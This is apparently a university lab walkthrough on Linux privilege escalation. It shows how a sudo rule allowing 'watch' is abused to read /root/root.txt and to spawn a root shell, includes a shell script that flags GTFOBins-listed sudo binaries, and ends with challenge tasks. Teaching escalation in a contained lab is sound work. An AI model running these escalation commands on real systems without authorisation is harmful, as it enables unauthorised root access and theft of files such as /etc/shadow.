Walkthrough: Using limited sudo rights to escalate privileges

In this walkthrough we take advantage of a misconfigured sudo rule to read the flag. The example is specific, but the same approach (enumerate what the user can run, check whether any of it can be abused) works for discovering privilege escalation on any target system.

The Challenge is in the 245_Labs git repo under /Week4_Privec/SudoDemo

Starting the Container

First we need to start the container using docker-compose:

$ docker-compose up
Starting sudodemo_ssh_1 ... done
Attaching to sudodemo_ssh_1
ssh_1  | ==============================================================
ssh_1  | |                                                            |
ssh_1  | |                                                            |
ssh_1  | |   SSH Service Started:                                     |
ssh_1  | |                                                            |
ssh_1  | |                 Username:  cueh                            |
ssh_1  | |                 Password:  cueh                            |
ssh_1  | |                                                            |
ssh_1  | |   IP address For SSH is 192.168.144.2                          |
ssh_1  | |                                                            |
ssh_1  | |                                                            |
ssh_1  | |  Connect with: ssh cueh@192.168.144.2                          |
ssh_1  | |                                                            |
ssh_1  | ==============================================================

Connecting to the Challenge

We can then connect from another terminal window using SSH, using the address printed in the container banner. (The transcript below was captured from a different run, so the address it shows differs from the banner above; use whatever your own banner prints.)

$ ssh cueh@172.17.0.3
cueh@172.17.0.3's password: 
Linux f4a8c9bcd0e8 5.0.9-arch1-1-ARCH #1 SMP PREEMPT Sat Apr 20 15:00:46 UTC 2019 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
cueh@f4a8c9bcd0e8:~$ 

Normally, we would find exploitable files through system enumeration. A good place to start is seeing what files the user has access to and what they are allowed to run.

ls -l

shows there is nothing interesting in the user's home directory. Let's see whether we have sudo rights for anything:

cueh@f4a8c9bcd0e8:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for cueh: 
Matching Defaults entries for cueh on f4a8c9bcd0e8:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User cueh may run the following commands on f4a8c9bcd0e8:
    (root) /usr/bin/watch, /sbin/poweroff
cueh@f4a8c9bcd0e8:~$ 

Looking through the command list, there are two commands we can run with sudo:

  • watch - execute a program periodically, showing output full screen
  • poweroff - shuts the machine down, which is not useful to us here

Note that neither entry restricts the arguments, so we can pass watch whatever command line we like.

Taking a look at GTFOBins shows that watch is indeed exploitable when it can be run with sudo.

Let's have a quick think about what watch allows us to do. It runs a command repeatedly (every 2 seconds by default) and displays that command's output. Because sudo runs watch as root, every command watch spawns is also run as root; combined with the unrestricted arguments, that means we can run any command as root.
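As an added example that is not part of the original walkthrough, the POSIX shell functions below automate the check just described: they parse the text of sudo -l, pull out each "(runas) tags command" entry, and flag those whose basename appears on the sudo section of GTFOBins (the list embedded here is a hand-picked subset). The sample sudo -l output is constructed from the transcript above; the extra NOPASSWD line for find is invented to show that tags are handled and is not part of the lab. Only sh and awk are needed, and nothing here runs sudo itself.

```sh
#!/bin/sh
# Added example (not from the lab): pull the allowed commands out of 'sudo -l'
# output and flag those that GTFOBins documents as giving a shell or file read.
# Only sh and awk are needed; nothing here runs sudo itself.

# Constructed sample of 'sudo -l' output. The watch/poweroff line is copied
# from the walkthrough transcript; the NOPASSWD line is invented to show tags.
SAMPLE_SUDO_L='Matching Defaults entries for cueh on f4a8c9bcd0e8:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User cueh may run the following commands on f4a8c9bcd0e8:
    (root) /usr/bin/watch, /sbin/poweroff
    (root) NOPASSWD: /usr/bin/find'

# Hand-picked subset of binaries from the sudo section of GTFOBins.
GTFO_SUDO_ESCAPES="awk bash env find less man more nano perl python python3 sh tar vi vim watch zip"

# Print one line per allowed command: "<runas> <tags|-> <command> [args]".
# Usage on a live box: sudo_allowed_commands "$(sudo -l 2>/dev/null)"
sudo_allowed_commands() {
    printf '%s\n' "$1" | awk '
        /may run the following commands/ { in_cmds = 1; next }
        in_cmds && /^[[:space:]]*\(/ {
            line = $0
            sub(/^[[:space:]]*/, "", line)
            match(line, /^\([^)]*\)/)          # runas spec, e.g. "(root)"
            runas = substr(line, RSTART, RLENGTH)
            line = substr(line, RLENGTH + 1)
            tags = ""                          # NOPASSWD:, SETENV:, ... may stack
            while (match(line, /^[[:space:]]*[A-Z]+:/)) {
                t = substr(line, RSTART, RLENGTH)
                gsub(/[[:space:]:]/, "", t)
                tags = (tags == "") ? t : tags "," t
                line = substr(line, RSTART + RLENGTH)
            }
            if (tags == "") tags = "-"
            n = split(line, cmds, /,[[:space:]]*/)   # several commands per line
            for (i = 1; i <= n; i++) {
                c = cmds[i]
                sub(/^[[:space:]]*/, "", c); sub(/[[:space:]]*$/, "", c)
                if (c != "") print runas, tags, c
            }
        }'
}

# Print "ESCAPE <runas> <tags> <command> [args]" for each entry worth a look:
# either ALL, or a binary whose basename is on the GTFOBins subset above.
flag_gtfobins() {
    sudo_allowed_commands "$1" | while read -r runas tags cmd args; do
        base=${cmd##*/}
        hit=0
        if [ "$cmd" = "ALL" ]; then hit=1; fi
        for b in $GTFO_SUDO_ESCAPES; do
            if [ "$base" = "$b" ]; then hit=1; fi
        done
        if [ "$hit" -eq 1 ]; then
            printf 'ESCAPE %s %s %s%s\n' "$runas" "$tags" "$cmd" "${args:+ $args}"
        fi
    done
    return 0
}

flag_gtfobins "$SAMPLE_SUDO_L"
```

Run against the sample it reports watch and find and stays quiet about poweroff. Two caveats a practitioner should keep in mind: sudo -l prompts for the user's password unless the rule carries NOPASSWD (the transcript above had to enter it), and an entry that pins the arguments (for example `/usr/bin/watch ""`, which sudoers treats as "no arguments allowed") is printed with those arguments and may not be abusable even though the binary is on the list.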

Simply Reading the Flag File

There are two ways we can get the flag here. Let's take the easy one first.

We know of several commands that output the contents of a file to the terminal, for example cat. As watch shows the output of whatever command it runs, perhaps we can abuse it to display the flag.

The command we need to run is cat /root/root.txt, but on its own that fails with a permissions error, because we are trying to read a file we don't own:

cueh@f4a8c9bcd0e8:~$ cat /root/root.txt
cat: /root/root.txt: Permission denied

Running watch with sudo means the cat it spawns runs as root, so it can read the file:

cueh@f4a8c9bcd0e8:~$ sudo watch cat /root/root.txt

which gives us the contents of the flag:

Every 2.0s: cat /root/root.txt    f4a8c9bcd0e8: Wed May  8 13:23:15 2019

245CT{...flag redacted ...}

Note

We can read any file on the system this way, including /etc/shadow.

Upgrading from Read access to a Shell.

While it's pretty cool to be able to read a file with root privileges, read access is still limited. Sometimes the vulnerable binary can be used to get a root shell. This could be considered the ultimate goal, as it gives us access to every part of the system.

OK, so we are using watch to view the file; can we upgrade it to a shell? This time we follow the suggestion on GTFOBins. The -x flag makes watch exec the command directly rather than passing it through sh -c; reset clears the screen watch has drawn; and exec sh 1>&0 2>&0 replaces the process with a shell whose stdout and stderr point at the terminal inherited on stdin, which matters because watch captures the child's normal stdout and stderr through a pipe rather than letting them reach the screen.

watch -x sh -c 'reset; exec sh 1>&0 2>&0'

Trying this gives us a fully functional root shell, which we can use to read the flag:

cueh@f4a8c9bcd0e8:~$ sudo watch -x sh -c 'reset; exec sh 1>&0 2>&0'
# id
uid=0(root) gid=0(root) groups=0(root)
# 
# cat /root/root.txt
245CT{... REDACTED ...}
# 

Your Turn

Easy task

Work through the walkthrough and get the genuine flag.

Task

There is a second sudo-based privesc available in the Sudo_Challenge_1 directory. Work through the process and find the flag.

HINTS:

  • Think about the commands available to you: what does each command allow us to do?
  • You may need to take two steps to get the root shell.
